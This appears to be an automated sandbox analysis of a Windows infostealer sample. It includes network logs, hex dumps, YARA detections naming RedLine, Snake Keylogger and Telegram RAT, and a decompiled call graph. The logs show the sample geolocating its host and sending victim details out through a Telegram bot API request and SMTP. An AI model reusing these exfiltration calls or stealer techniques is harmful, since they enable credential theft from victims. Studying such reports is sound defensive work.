                                                                                                                                      Age: 7447
                                                                                                                                      Last-Modified: Wed, 06 Nov 2024 09:41:11 GMT
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eaQNJ9oeJQZ4q8P2on1AH5j%2BIggH8yXQ1h2auraY2yCsd4sdT8%2FmqCaT2ragUnG42TjeEdp%2BIgS9MazIIPM9UOaEHv5jS%2BQ6PHs9d71bxOd0IDxBE6RRXRuus48xV2W0WimUfLb4"}],"group":"cf-nel","max_age":604800}
                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                      Server: cloudflare
                                                                                                                                      CF-RAY: 8de4d6298ffb475b-DFW
                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=951&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=701&delivery_rate=3007268&cwnd=251&unsent_bytes=0&cid=4514ce2d71cacd40&ts=144&x=0"
                                                                                                                                      2024-11-06 11:45:18 UTC152INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 30 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54
                                                                                                                                      Data Ascii: <Response><IP>173.254.250.80</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>T
                                                                                                                                      2024-11-06 11:45:18 UTC207INData Raw: 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 31 2e 30 30 36 35 3c 2f 4c 61 74 69 74 75 64 65 3e 0a 09 3c 4c 6f 6e 67 69 74 75 64 65 3e 2d 39 37 2e 38 34 30 36 3c 2f 4c 6f 6e 67 69 74 75 64 65 3e 0a 09 3c 4d 65 74 72 6f 43 6f 64 65 3e 36 32 35 3c 2f 4d 65 74 72 6f 43 6f 64 65 3e 0a 3c 2f 52 65 73 70 6f 6e 73 65 3e 0a
                                                                                                                                      Data Ascii: exas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>31.0065</Latitude><Longitude>-97.8406</Longitude><MetroCode>625</MetroCode></Response>


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      7192.168.2.549756188.114.97.34433688C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-11-06 11:45:20 UTC63OUTGET /xml/173.254.250.80 HTTP/1.1
                                                                                                                                      Host: reallyfreegeoip.org
                                                                                                                                      2024-11-06 11:45:20 UTC1218INHTTP/1.1 200 OK
                                                                                                                                      Date: Wed, 06 Nov 2024 11:45:20 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 359
                                                                                                                                      Connection: close
                                                                                                                                      x-amzn-requestid: 9bc882c6-79f2-4519-942c-9a988b7ce8d5
                                                                                                                                      x-amzn-trace-id: Root=1-672b39b7-2aea25c92b76380c57f02b5b;Parent=7aaad53b6bd38774;Sampled=0;Lineage=1:fc9e8231:0
                                                                                                                                      x-cache: Miss from cloudfront
                                                                                                                                      via: 1.1 bf9e5565039f7e32c47e53e1895197ba.cloudfront.net (CloudFront)
                                                                                                                                      x-amz-cf-pop: DFW57-P5
                                                                                                                                      x-amz-cf-id: LvPVug8Ta1AvDo7CVtDky3YkXV9WgQyS7vNag26vEt1ucU6wXAjPVQ==
                                                                                                                                      Cache-Control: max-age=31536000
                                                                                                                                      CF-Cache-Status: HIT
                                                                                                                                      Age: 7449
                                                                                                                                      Last-Modified: Wed, 06 Nov 2024 09:41:11 GMT
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VmsmwbjOI6U2dByWM9%2BwjJMKVsvhVDyH%2BQMZcyXKFG8jKw5vWq4PT0q38cMifvqxTjv75lfoaAdG3lJPZJC5bAYo%2F4baVb3bfq5Q15GNVYlTjn8aFp8d%2FHzRyCfs37snFalmrRc3"}],"group":"cf-nel","max_age":604800}
                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                      Server: cloudflare
                                                                                                                                      CF-RAY: 8de4d638d9b76b4c-DFW
                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1818&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=1686662&cwnd=233&unsent_bytes=0&cid=a950bfd2798b1b49&ts=160&x=0"
                                                                                                                                      2024-11-06 11:45:20 UTC151INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 30 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e
                                                                                                                                      Data Ascii: <Response><IP>173.254.250.80</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>
                                                                                                                                      2024-11-06 11:45:20 UTC208INData Raw: 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 31 2e 30 30 36 35 3c 2f 4c 61 74 69 74 75 64 65 3e 0a 09 3c 4c 6f 6e 67 69 74 75 64 65 3e 2d 39 37 2e 38 34 30 36 3c 2f 4c 6f 6e 67 69 74 75 64 65 3e 0a 09 3c 4d 65 74 72 6f 43 6f 64 65 3e 36 32 35 3c 2f 4d 65 74 72 6f 43 6f 64 65 3e 0a 3c 2f 52 65 73 70 6f 6e 73 65 3e 0a
                                                                                                                                      Data Ascii: Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>31.0065</Latitude><Longitude>-97.8406</Longitude><MetroCode>625</MetroCode></Response>


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      8192.168.2.549767188.114.97.34433688C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-11-06 11:45:22 UTC87OUTGET /xml/173.254.250.80 HTTP/1.1
                                                                                                                                      Host: reallyfreegeoip.org
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      2024-11-06 11:45:22 UTC1220INHTTP/1.1 200 OK
                                                                                                                                      Date: Wed, 06 Nov 2024 11:45:22 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 359
                                                                                                                                      Connection: close
                                                                                                                                      x-amzn-requestid: 9bc882c6-79f2-4519-942c-9a988b7ce8d5
                                                                                                                                      x-amzn-trace-id: Root=1-672b39b7-2aea25c92b76380c57f02b5b;Parent=7aaad53b6bd38774;Sampled=0;Lineage=1:fc9e8231:0
                                                                                                                                      x-cache: Miss from cloudfront
                                                                                                                                      via: 1.1 bf9e5565039f7e32c47e53e1895197ba.cloudfront.net (CloudFront)
                                                                                                                                      x-amz-cf-pop: DFW57-P5
                                                                                                                                      x-amz-cf-id: LvPVug8Ta1AvDo7CVtDky3YkXV9WgQyS7vNag26vEt1ucU6wXAjPVQ==
                                                                                                                                      Cache-Control: max-age=31536000
                                                                                                                                      CF-Cache-Status: HIT
                                                                                                                                      Age: 7451
                                                                                                                                      Last-Modified: Wed, 06 Nov 2024 09:41:11 GMT
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6zRIDh3KeQVrsVCDki4f7z6nyhY%2FxWOljWcL9MbRyREPuXGfqvhMUyTgbgP8MZrcjyXNoTR7LHoK%2B%2B3oc1fha713%2BNmKtcQflBd5NdgGuBt0M%2FhJXXcbMGPP30WzCjB5CgU1cxjJ"}],"group":"cf-nel","max_age":604800}
                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                      Server: cloudflare
                                                                                                                                      CF-RAY: 8de4d641ce9a6bf2-DFW
                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1696&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=1700528&cwnd=251&unsent_bytes=0&cid=17abe8e96393fed6&ts=148&x=0"
                                                                                                                                      2024-11-06 11:45:22 UTC149INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 30 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d
                                                                                                                                      Data Ascii: <Response><IP>173.254.250.80</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionNam
                                                                                                                                      2024-11-06 11:45:22 UTC210INData Raw: 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 31 2e 30 30 36 35 3c 2f 4c 61 74 69 74 75 64 65 3e 0a 09 3c 4c 6f 6e 67 69 74 75 64 65 3e 2d 39 37 2e 38 34 30 36 3c 2f 4c 6f 6e 67 69 74 75 64 65 3e 0a 09 3c 4d 65 74 72 6f 43 6f 64 65 3e 36 32 35 3c 2f 4d 65 74 72 6f 43 6f 64 65 3e 0a 3c 2f 52 65 73 70 6f 6e 73 65 3e 0a
                                                                                                                                      Data Ascii: e>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>31.0065</Latitude><Longitude>-97.8406</Longitude><MetroCode>625</MetroCode></Response>


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      9192.168.2.549771149.154.167.2204433688C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-11-06 11:45:23 UTC349OUTGET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:675052%0D%0ADate%20and%20Time:%2007/11/2024%20/%2012:59:44%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20675052%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1
                                                                                                                                      Host: api.telegram.org
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      2024-11-06 11:45:23 UTC344INHTTP/1.1 404 Not Found
                                                                                                                                      Server: nginx/1.18.0
                                                                                                                                      Date: Wed, 06 Nov 2024 11:45:23 GMT
                                                                                                                                      Content-Type: application/json
                                                                                                                                      Content-Length: 55
                                                                                                                                      Connection: close
                                                                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                                      2024-11-06 11:45:23 UTC55INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d
                                                                                                                                      Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}


                                                                                                                                      TimestampSource PortDest PortSource IPDest IPCommands
                                                                                                                                      Nov 6, 2024 12:45:29.858689070 CET58749807166.62.28.135192.168.2.5220-sg2plzcpnl506897.prod.sin2.secureserver.net ESMTP Exim 4.96.2 #2 Wed, 06 Nov 2024 04:45:29 -0700
                                                                                                                                      220-We do not authorize the use of this system to transport unsolicited,
                                                                                                                                      220 and/or bulk e-mail.
                                                                                                                                      Nov 6, 2024 12:45:29.859013081 CET49807587192.168.2.5166.62.28.135EHLO 675052
                                                                                                                                      Nov 6, 2024 12:45:30.198474884 CET58749807166.62.28.135192.168.2.5250-sg2plzcpnl506897.prod.sin2.secureserver.net Hello 675052 [173.254.250.80]
                                                                                                                                      250-SIZE 52428800
                                                                                                                                      250-8BITMIME
                                                                                                                                      250-PIPELINING
                                                                                                                                      250-PIPECONNECT
                                                                                                                                      250-AUTH PLAIN LOGIN
                                                                                                                                      250-STARTTLS
                                                                                                                                      250 HELP
                                                                                                                                      Nov 6, 2024 12:45:30.198743105 CET49807587192.168.2.5166.62.28.135STARTTLS
                                                                                                                                      Nov 6, 2024 12:45:30.540788889 CET58749807166.62.28.135192.168.2.5220 TLS go ahead

                                                                                                                                      Click to jump to process

                                                                                                                                      Click to jump to process

                                                                                                                                      Click to dive into process behavior distribution

                                                                                                                                      Click to jump to process

                                                                                                                                      Target ID:0
                                                                                                                                      Start time:06:44:52
                                                                                                                                      Start date:06/11/2024
                                                                                                                                      Path:C:\Users\user\Desktop\NOAH $$$$.exe
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:"C:\Users\user\Desktop\NOAH $$$$.exe"
                                                                                                                                      Imagebase:0x400000
                                                                                                                                      File size:1'221'899 bytes
                                                                                                                                      MD5 hash:3D10835AD12C3AB37CD08002B14C4CBF
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Yara matches:
                                                                                                                                      • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000000.00000002.2031225515.0000000002F40000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                      Reputation:low
                                                                                                                                      Has exited:true

                                                                                                                                      Target ID:2
                                                                                                                                      Start time:06:44:54
                                                                                                                                      Start date:06/11/2024
                                                                                                                                      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:"C:\Users\user\Desktop\NOAH $$$$.exe"
                                                                                                                                      Imagebase:0x20000
                                                                                                                                      File size:45'984 bytes
                                                                                                                                      MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Yara matches:
                                                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.4475403957.000000000278F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                      • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000002.00000002.4475403957.000000000278F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.4475149888.0000000002480000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                      • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000002.00000002.4475149888.0000000002480000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                      • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000002.00000002.4475149888.0000000002480000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                      • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000002.00000002.4475149888.0000000002480000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000002.00000002.4475149888.0000000002480000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                      • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000002.00000002.4475149888.0000000002480000.00000004.08000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                      • Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000002.00000002.4475149888.0000000002480000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth
                                                                                                                                      • Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, Description: Detects executables with potential process hoocking, Source: 00000002.00000002.4475149888.0000000002480000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.4474835763.00000000022C9000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                      • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000002.00000002.4474835763.00000000022C9000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                      • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000002.00000002.4474835763.00000000022C9000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000002.00000002.4474835763.00000000022C9000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                      • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000002.00000002.4474835763.00000000022C9000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                      • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000002.00000002.4473920648.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: ditekSHen
                                                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.4476818594.0000000003721000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000002.00000002.4476818594.0000000003721000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                      • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000002.00000002.4475403957.0000000002681000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.4477864222.0000000004AC0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                      • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000002.00000002.4477864222.0000000004AC0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                      • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000002.00000002.4477864222.0000000004AC0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                      • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000002.00000002.4477864222.0000000004AC0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000002.00000002.4477864222.0000000004AC0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                      • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000002.00000002.4477864222.0000000004AC0000.00000004.08000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                      • Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000002.00000002.4477864222.0000000004AC0000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth
                                                                                                                                      • Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, Description: Detects executables with potential process hoocking, Source: 00000002.00000002.4477864222.0000000004AC0000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                                                                                                                      Reputation:high
                                                                                                                                      Has exited:false

                                                                                                                                      Reset < >

                                                                                                                                        Execution Graph

                                                                                                                                        Execution Coverage:3.4%
                                                                                                                                        Dynamic/Decrypted Code Coverage:1.5%
                                                                                                                                        Signature Coverage:11.8%
                                                                                                                                        Total number of Nodes:2000
                                                                                                                                        Total number of Limit Nodes:36
                                                                                                                                        execution_graph 86045 4010e0 86048 401100 86045->86048 86047 4010f8 86049 401113 86048->86049 86051 401120 86049->86051 86052 401184 86049->86052 86053 40114c 86049->86053 86079 401182 86049->86079 86050 40112c DefWindowProcW 86050->86047 86051->86050 86107 401000 Shell_NotifyIconW __cftoa_l 86051->86107 86086 401250 86052->86086 86055 401151 86053->86055 86056 40119d 86053->86056 86058 401219 86055->86058 86059 40115d 86055->86059 86057 42afb4 86056->86057 86061 4011a3 86056->86061 86102 40f190 10 API calls 86057->86102 86058->86051 86064 401225 86058->86064 86062 401163 86059->86062 86063 42b01d 86059->86063 86061->86051 86068 4011b6 KillTimer 86061->86068 86069 4011db SetTimer RegisterWindowMessageW 86061->86069 86070 42afe9 86062->86070 86071 40116c 86062->86071 86063->86050 86106 4370f4 52 API calls 86063->86106 86109 468b0e 74 API calls __cftoa_l 86064->86109 86066 401193 86066->86047 86067 42b04f 86108 40e0c0 74 API calls __cftoa_l 86067->86108 86101 401000 Shell_NotifyIconW __cftoa_l 86068->86101 86069->86066 86076 401204 CreatePopupMenu 86069->86076 86104 40f190 10 API calls 86070->86104 86071->86051 86078 401174 86071->86078 86076->86047 86103 45fd57 65 API calls __cftoa_l 86078->86103 86079->86050 86080 42afe4 86080->86066 86081 42b00e 86105 401a50 338 API calls 86081->86105 86082 4011c9 PostQuitMessage 86082->86047 86085 42afdc 86085->86050 86085->86080 86087 4012e8 86086->86087 86088 401262 __cftoa_l 86086->86088 86087->86066 86110 401b80 86088->86110 86090 40128c 86091 4012d1 KillTimer SetTimer 86090->86091 86092 4012bb 86090->86092 86093 4272ec 86090->86093 86091->86087 86094 4012c5 86092->86094 86095 42733f 86092->86095 86096 4272f4 Shell_NotifyIconW 86093->86096 86097 42731a Shell_NotifyIconW 86093->86097 86094->86091 86098 427393 Shell_NotifyIconW 86094->86098 86099 427348 Shell_NotifyIconW 86095->86099 86100 42736e Shell_NotifyIconW 86095->86100 86096->86091 86097->86091 86098->86091 86099->86091 86100->86091 86101->86082 86102->86066 86103->86085 86104->86081 86105->86079 86106->86079 86107->86067 86108->86079 86109->86080 86111 401b9c 86110->86111 86131 401c7e 86110->86131 86132 4013c0 52 API calls 86111->86132 86113 401bac 86114 42722b LoadStringW 86113->86114 86115 401bb9 86113->86115 86117 427246 86114->86117 86133 402160 86115->86133 86147 40e0a0 86117->86147 86118 401bcd 86120 427258 86118->86120 86121 401bda 86118->86121 86151 40d200 52 API calls 2 library calls 86120->86151 86121->86117 86123 401be4 86121->86123 86146 40d200 52 API calls 2 library calls 86123->86146 86125 427267 86126 42727b 86125->86126 86128 401bf3 _wcscpy __cftoa_l _wcsncpy 86125->86128 86152 40d200 52 API calls 2 library calls 86126->86152 86130 401c62 Shell_NotifyIconW 86128->86130 86129 427289 86130->86131 86131->86090 86132->86113 86134 426daa 86133->86134 86135 40216b _wcslen 86133->86135 86166 40c600 86134->86166 86138 402180 86135->86138 86139 40219e 86135->86139 86137 426db5 86137->86118 86153 403bd0 52 API calls moneypunct 86138->86153 86154 4013a0 52 API calls 86139->86154 86142 402187 _memmove 86142->86118 86143 426db7 86144 4021a5 86144->86143 86155 4115d7 86144->86155 86146->86128 86148 40e0b2 86147->86148 86149 40e0a8 86147->86149 86148->86128 86202 403c30 52 API calls _memmove 86149->86202 86151->86125 86152->86129 86153->86142 86154->86144 86157 4115e1 _malloc 86155->86157 86158 4115fb 86157->86158 86161 4115fd std::exception::exception 86157->86161 86171 4135bb 86157->86171 86158->86142 86159 41163b 86186 4180af 46 API calls std::exception::operator= 86159->86186 86161->86159 86185 41130a 51 API calls __cinit 86161->86185 86162 411645 86187 418105 RaiseException 86162->86187 86165 411656 86167 40c619 86166->86167 86168 40c60a 86166->86168 86167->86137 86168->86167 86194 4026f0 86168->86194 86170 426d7a _memmove 86170->86137 86172 413638 _malloc 86171->86172 86178 4135c9 _malloc 86171->86178 86193 417f77 46 API calls __getptd_noexit 86172->86193 86175 4135f7 RtlAllocateHeap 86175->86178 86184 413630 86175->86184 86177 413624 86191 417f77 46 API calls __getptd_noexit 86177->86191 86178->86175 86178->86177 86179 4135d4 86178->86179 86182 413622 86178->86182 86179->86178 86188 418901 46 API calls __NMSG_WRITE 86179->86188 86189 418752 46 API calls 6 library calls 86179->86189 86190 411682 GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 86179->86190 86192 417f77 46 API calls __getptd_noexit 86182->86192 86184->86157 86185->86159 86186->86162 86187->86165 86188->86179 86189->86179 86191->86182 86192->86184 86193->86184 86195 426873 86194->86195 86196 4026ff 86194->86196 86201 4013a0 52 API calls 86195->86201 86196->86170 86198 42687b 86199 4115d7 52 API calls 86198->86199 86200 42689e _memmove 86199->86200 86200->86170 86201->86198 86202->86148 86203 40bd20 86204 428194 86203->86204 86213 40bd2d 86203->86213 86205 40bd43 86204->86205 86207 4281bc 86204->86207 86209 4281b2 86204->86209 86225 45e987 86 API calls moneypunct 86207->86225 86224 40b510 VariantClear 86209->86224 86211 40bd37 86215 40bd50 86211->86215 86213->86211 86226 4531b1 85 API calls 5 library calls 86213->86226 86214 4281ba 86216 426cf1 86215->86216 86217 40bd63 86215->86217 86236 44cde9 52 API calls _memmove 86216->86236 86227 40bd80 86217->86227 86220 40bd73 86220->86205 86221 426cfc 86222 40e0a0 52 API calls 86221->86222 86223 426d02 86222->86223 86224->86214 86225->86213 86226->86211 86228 40bd8e 86227->86228 86229 40bdb7 _memmove 86227->86229 86228->86229 86230 40bded 86228->86230 86231 40bdad 86228->86231 86229->86220 86233 4115d7 52 API calls 86230->86233 86237 402f00 86231->86237 86234 40bdf6 86233->86234 86234->86229 86235 4115d7 52 API calls 86234->86235 86235->86229 86236->86221 86238 402f10 86237->86238 86239 402f0c 86237->86239 86240 4268c3 86238->86240 86241 4115d7 52 API calls 86238->86241 86239->86229 86242 402f51 moneypunct _memmove 86241->86242 86242->86229 86243 42b1d2 86252 40bc10 86243->86252 86245 42b1e0 86263 4720db 86245->86263 86247 42b228 86350 45e737 90 API calls 3 library calls 86247->86350 86249 42bb6a 86351 44b92d VariantClear 86249->86351 86251 42bc5b 86253 40bc24 86252->86253 86254 40bc17 86252->86254 86255 40bc2a 86253->86255 86256 40bc3c 86253->86256 86352 408e80 86254->86352 86259 408e80 VariantClear 86255->86259 86260 4115d7 52 API calls 86256->86260 86261 40bc33 86259->86261 86262 40bc43 86260->86262 86261->86245 86262->86245 86264 472108 __cftoa_l 86263->86264 86265 4721d1 86264->86265 86266 47215e 86264->86266 86268 47226d 86265->86268 86270 472545 SHGetFolderPathW 